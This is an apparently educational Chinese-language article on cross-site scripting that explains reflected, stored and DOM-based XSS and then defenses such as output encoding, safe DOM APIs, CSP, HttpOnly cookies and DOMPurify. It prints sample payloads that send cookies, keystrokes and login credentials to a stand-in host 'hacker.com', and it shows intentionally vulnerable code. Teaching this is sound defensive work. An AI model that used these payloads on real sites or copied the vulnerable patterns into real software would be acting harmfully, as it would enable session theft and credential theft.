XSS跨站脚本攻击详解：黑客是如何通过网页“绑架”你的？

XSS跨站脚本攻击详解：黑客是如何通过网页“绑架”你的？摘要

跨站脚本攻击（XSS）是Web安全领域最隐蔽、最危险的漏洞之一。与直接攻击服务器的SQL注入不同，XSS攻击的目标是网站的访客——通过在网页中注入恶意脚本，黑客可以“绑架”每个访问者的浏览器，窃取Cookie、会话令牌，甚至记录键盘输入。本文将全面解析XSS攻击的三种主要类型：反射型、存储型和DOM型，通过详细的代码示例和实战演练，揭示黑客如何利用XSS劫持用户会话、发起钓鱼攻击、传播恶意软件。同时，本文将深入探讨XSS的防御机制，帮助开发者构建安全的Web应用，保护用户免受黑客的跨站“绑架”。

关键词： XSS；跨站脚本攻击；反射型XSS；存储型XSS；DOM型XSS；会话劫持；CSP；输入过滤

---

第一章 引言：当网页成为“绑架”的工具

想象这样一个场景：你打开了一个常去的新闻网站，浏览一篇感兴趣的文章。一切看起来都很正常——页面布局、广告位、评论区都和往常一样。然而，在你完全不知情的情况下，一段隐藏的脚本正在你的浏览器中悄悄运行，它将你的会话Cookie发送给了某个黑客的服务器。几分钟后，黑客用这个Cookie登录了你的邮箱、社交媒体，甚至网上银行。

这不是科幻电影的桥段，而是XSS（跨站脚本攻击）每天都在上演的现实。XSS攻击的可怕之处在于它的隐蔽性——受害者没有任何异常感知，页面看起来完全正常，但恶意代码已经在背后窃取着一切。据安全机构统计，XSS漏洞在Web应用中普遍存在，常年位列OWASP Top 10。

第二章 XSS攻击的基本概念2.1 什么是XSS

XSS全称Cross-Site Scripting（跨站脚本攻击），是指黑客在目标网站中注入恶意脚本，当用户访问该网站时，脚本在用户的浏览器中执行，从而实现黑客的恶意目的。

XSS的核心在于浏览器对网页内容的“信任”。浏览器认为，从某个网站加载的所有代码都应该受到该网站安全策略的约束。如果黑客成功在网页中注入了自己的代码，浏览器会“天真地”认为这些代码也是网站的一部分，赋予它们访问该网站敏感数据（如Cookie、LocalStorage）的权限。

2.2 XSS的危害

一次成功的XSS攻击可能造成的后果包括：

• 会话劫持：窃取用户的Cookie，冒充用户登录网站
• 键盘记录：记录用户在页面上的每一次按键，包括密码、信用卡号
• 钓鱼攻击：在正常页面中插入伪造的登录框，诱骗用户输入凭证
• 网页篡改：修改页面内容，发布虚假信息或恶意广告
• 恶意软件传播：诱导用户下载并执行恶意程序
• 内网扫描：利用受害者的浏览器扫描其内网，发现更多攻击目标
  
  

2.3 XSS的三种类型

根据恶意脚本的注入和执行方式，XSS主要分为三类：

• 反射型XSS：恶意脚本通过URL参数传递，在服务器响应中“反射”回浏览器执行
• 存储型XSS：恶意脚本被存储在目标服务器上（如数据库），所有访问者都会受害
• DOM型XSS：恶意脚本在客户端运行，直接操纵DOM节点，不经过服务器
  
  

第三章 反射型XSS：一次性的陷阱3.1 反射型XSS的原理

反射型XSS是最简单、最常见的XSS形式。它的攻击流程如下：

• 黑客构造一个包含恶意脚本的URL，例如：http://example.com/search?q=<script>alert('XSS')</script>
• 通过钓鱼邮件、社交媒体等方式将URL发送给受害者
• 受害者点击链接，向目标网站发送请求
• 服务器将URL参数中的内容（包括恶意脚本）嵌入到响应页面中
• 受害者的浏览器执行响应页面中的恶意脚本
• 恶意脚本将受害者的敏感数据发送给黑客
  
  

3.2 反射型XSS的特点

• 非持久性：恶意脚本不存储在服务器上，只存在于特定的URL中
• 需要诱骗点击：黑客必须诱导用户访问特制链接
• 一次性：每个受害者都需要点击特定链接
  
  

3.3 反射型XSS的实战案例

假设一个搜索网站的后端代码如下：

[size=12.573px]php



<?php$query = $_GET['q';echo "您搜索的关键词是：" . $query;?>

这段代码直接将URL参数q的内容输出到页面，没有任何过滤。

黑客构造恶意URL：

[size=12.573px]text



http://example.com/search?q=<script>document.location='http://hacker.com/steal.php?cookie='+document.cookie</script>

当用户点击这个链接时，浏览器会执行注入的脚本，将用户的Cookie发送到hacker.com。黑客收到Cookie后，可以直接用来登录用户的账户。

第四章 存储型XSS：持久化的噩梦4.1 存储型XSS的原理

存储型XSS是危害最大的XSS类型。恶意脚本被永久存储在目标服务器上（如数据库、文件系统），当普通用户访问相关页面时，脚本自动执行。

攻击流程：

• 黑客在目标网站的某个输入点（如评论区、留言板、个人信息）提交包含恶意脚本的内容
• 服务器将恶意内容存储到数据库中
• 后续用户访问包含该内容的页面时，服务器从数据库取出恶意内容并嵌入响应
• 所有访问者的浏览器都会执行恶意脚本
  
  

4.2 存储型XSS的特点

• 持久性：恶意脚本永久存在于服务器上
• 大规模危害：一次注入，影响所有访问者
• 无需诱骗：用户正常访问页面就会受害
  
  

4.3 存储型XSS的实战案例

让我们构建一个简单的留言板应用来演示存储型XSS：

[size=12.573px]html



<!DOCTYPE html><html><head>    <title>XSS演示留言板</title></head><body>    <h1>留言板</h1>    <form id="xssForm">        <input type="text" id="username" placeholder="用户名" required>        <textarea id="message" placeholder="留言内容" required></textarea>        <button type="submit">提交留言</button>    </form>    <div id="messages"></div>    <script>        const form = document.getElementById('xssForm');        const messagesDiv = document.getElementById('messages');        form.addEventListener('submit', (e) => {            e.preventDefault();            const username = document.getElementById('username').value;            const message = document.getElementById('message').value;                        // 危险！直接将用户输入插入页面            displayMessage(username, message);        });        function displayMessage(username, message) {            const msg = `<div><strong>${username}:</strong> ${message}</div>`;            // 使用innerHTML存在XSS风险            messagesDiv.innerHTML += msg;        }    </script></body></html>

如果黑客在留言内容中输入：

[size=12.573px]html



<script>alert('XSS攻击成功！你的会话已被劫持');</script>

这段脚本会被存储（在这个简化示例中是存储在内存中），当其他用户访问留言板时，脚本会在他们的浏览器中执行。

更真实的场景是，黑客会使用更隐蔽的代码，例如：

[size=12.573px]html



<img src="x" onerror="fetch('http://hacker.com/steal?cookie='+document.cookie)">

这段代码利用图片加载失败触发onerror事件，向黑客服务器发送用户的Cookie，且没有任何视觉提示。

4.4 真实案例：社交媒体蠕虫

2005年，MySpace上爆发了名为“Samy蠕虫”的存储型XSS攻击。黑客Samy Kamkar在个人资料中注入了恶意脚本，任何访问其页面的人都会自动将该脚本复制到自己的资料中，并添加Samy为好友。在短短20小时内，超过100万用户“感染”了这种蠕虫，导致MySpace不得不关闭服务进行修复。这是存储型XSS造成大规模传播的经典案例。

第五章 DOM型XSS：纯客户端的威胁5.1 DOM型XSS的原理

DOM型XSS与前两种类型最大的区别在于：它完全发生在客户端，不需要经过服务器。攻击流程如下：

• 黑客构造包含恶意脚本的URL
• 用户点击链接，浏览器加载页面
• 页面中的JavaScript代码在处理URL参数时，直接将恶意内容写入DOM
• 恶意脚本在用户浏览器中执行
  
  

关键点：服务器响应中不包含恶意脚本，脚本是由客户端代码动态生成的。

5.2 DOM型XSS的特点

• 不经过服务器：服务器日志中不会记录攻击痕迹
• 难以检测：传统的服务器端防御措施无效
• 依赖于客户端代码的写法
  
  

5.3 DOM型XSS的实战案例

假设一个页面使用以下JavaScript代码：

[size=12.573px]html



<script>    // 从URL获取参数    const urlParams = new URLSearchParams(window.location.search);    const name = urlParams.get('name');        // 直接将参数写入页面    document.write('欢迎您，' + name);</script>

当黑客构造以下URL时：

[size=12.573px]text



http://example.com/welcome.html?name=<script>alert('XSS')</script>

document.write会将<script>alert('XSS')</script>直接写入页面，脚本被执行。

第六章 XSS的进阶利用技术6.1 会话劫持

XSS最常见的利用方式是窃取用户的会话Cookie。Cookie中通常包含用于标识用户身份的会话ID。黑客通过XSS获取Cookie后，可以将其注入自己的浏览器，直接以受害者身份登录网站，无需知道用户名和密码。

恶意脚本示例：

[size=12.573px]javascript



var img = new Image();img.src = 'http://hacker.com/steal.php?cookie=' + encodeURIComponent(document.cookie);
6.2 键盘记录

黑客可以在页面中注入键盘监听脚本，记录用户在页面上的每一次按键：

[size=12.573px]javascript



document.addEventListener('keydown', function(e) {    fetch('http://hacker.com/log?key=' + e.key);});

这些按键可能包含密码、信用卡号、聊天内容等敏感信息。

6.3 钓鱼表单

黑客可以替换或插入伪造的登录表单，诱导用户输入凭证：

[size=12.573px]javascript



var fakeForm = '<div style="position:fixed; top:0; left:0; width:100%; height:100%; background:white;">' +               '<h2>会话已过期，请重新登录</h2>' +               '<input id="user" placeholder="用户名">' +               '<input id="pass" type="password" placeholder="密码">' +               '<button>登录</button></div>';document.body.innerHTML = fakeForm + document.body.innerHTML;function steal() {    var username = document.getElementById('user').value;    var password = document.getElementById('pass').value;    fetch('http://hacker.com/steal?u='+username+'&p='+password);}
6.4 内网端口扫描

利用JavaScript的fetch或WebSocket，黑客可以让受害者的浏览器尝试连接内网IP，根据响应时间或错误信息判断哪些端口开放，为进一步攻击做准备。

第七章 XSS的防御之道7.1 输入过滤

对所有用户输入进行严格的过滤，移除或转义可能构成脚本的字符。

• HTML转义：将<转义为&lt;，>转义为&gt;，"转义为&quot;等
• 移除危险标签：过滤<script>、<iframe>、<object>等标签
• 移除危险属性：过滤onerror、onload、onclick等事件处理器
  
  

7.2 输出编码

在将用户输入输出到页面时，根据输出位置进行适当的编码：

• HTML上下文：HTML实体编码
• JavaScript上下文：JavaScript字符串编码
• URL上下文：URL编码
• CSS上下文：CSS编码
  
  

7.3 使用安全的API

避免使用危险的内置方法：

• 避免：innerHTML、outerHTML、document.write()
• 推荐：innerText、textContent、createElement()
  
  

例如，将之前的留言板代码改为安全版本：

[size=12.573px]javascript



function displayMessage(username, message) {    const div = document.createElement('div');    const strong = document.createElement('strong');    strong.textContent = username + ': ';    div.appendChild(strong);    div.appendChild(document.createTextNode(message));    messagesDiv.appendChild(div);}
7.4 内容安全策略（CSP）

CSP是浏览器提供的最强大的XSS防御机制。通过HTTP响应头Content-Security-Policy，网站可以告诉浏览器：

• 只允许从哪些源加载脚本
• 禁止内联脚本执行
• 禁止eval()等危险函数
  
  

示例CSP头：

[size=12.573px]text



Content-Security-Policy: script-src 'self' https://trusted.cdn.com; object-src 'none'; base-uri 'none';

这个策略规定：只允许从本站和指定的CDN加载脚本，禁止内联脚本，禁止<object>等插件，禁止<base>标签。

7.5 HttpOnly Cookie

将会话Cookie标记为HttpOnly，这样JavaScript就无法通过document.cookie读取Cookie。即使存在XSS漏洞，黑客也无法窃取会话Cookie。

设置方式（以Node.js为例）：

[size=12.573px]javascript



res.cookie('sessionId', 'value', { httpOnly: true });
7.6 XSS过滤库

对于复杂场景，可以使用专业的XSS过滤库：

• DOMPurify：专门用于过滤HTML的JavaScript库，可以有效移除恶意代码
• OWASP Java HTML Sanitizer：Java平台的HTML过滤器
• Bleach：Python平台的HTML过滤器
  
  

使用示例：

[size=12.573px]javascript



import DOMPurify from 'dompurify';const clean = DOMPurify.sanitize(userInput);element.innerHTML = clean; // 现在可以安全使用
第八章 结语：从理解到防御

XSS攻击已经存在二十多年，却依然是Web应用最普遍的安全威胁。它的生命力恰恰源于Web技术的核心特性——动态内容和客户端执行。只要Web应用需要接受用户输入并在页面中展示，XSS的风险就始终存在。

正如安全专家所说：“XSS攻击有点像‘鬼’，很多人都听说过，但都没有遇到过。”但这并不代表XSS攻击不存在，而是现代框架和浏览器的安全机制，已经规避了大多数XSS攻击。Vue、React等现代框架默认会对绑定数据进行转义；浏览器的CSP策略可以限制脚本执行；开发者工具可以模拟XSS攻击进行测试。

对于开发者而言，防御XSS需要做到：

• 默认不相信任何用户输入
• 根据输出位置进行正确编码
• 使用安全的API和方法
• 部署CSP等多层防御机制
• 定期进行安全测试和代码审计
  
  

对于普通用户，虽然无法控制网站的代码质量，但可以通过以下方式降低风险：

• 及时更新浏览器，利用最新的安全机制
• 使用广告拦截插件，阻止恶意广告脚本
• 警惕不明链接，尤其是在要求输入敏感信息时
• 启用浏览器的“增强安全保护”等高级功能
  
  

技术在不断更新迭代，网络攻防是一个持久不变的话题。只有持续关注安全动态，不断学习新的攻击和防御技术，我们才能在这场无形的战争中立于不败之地。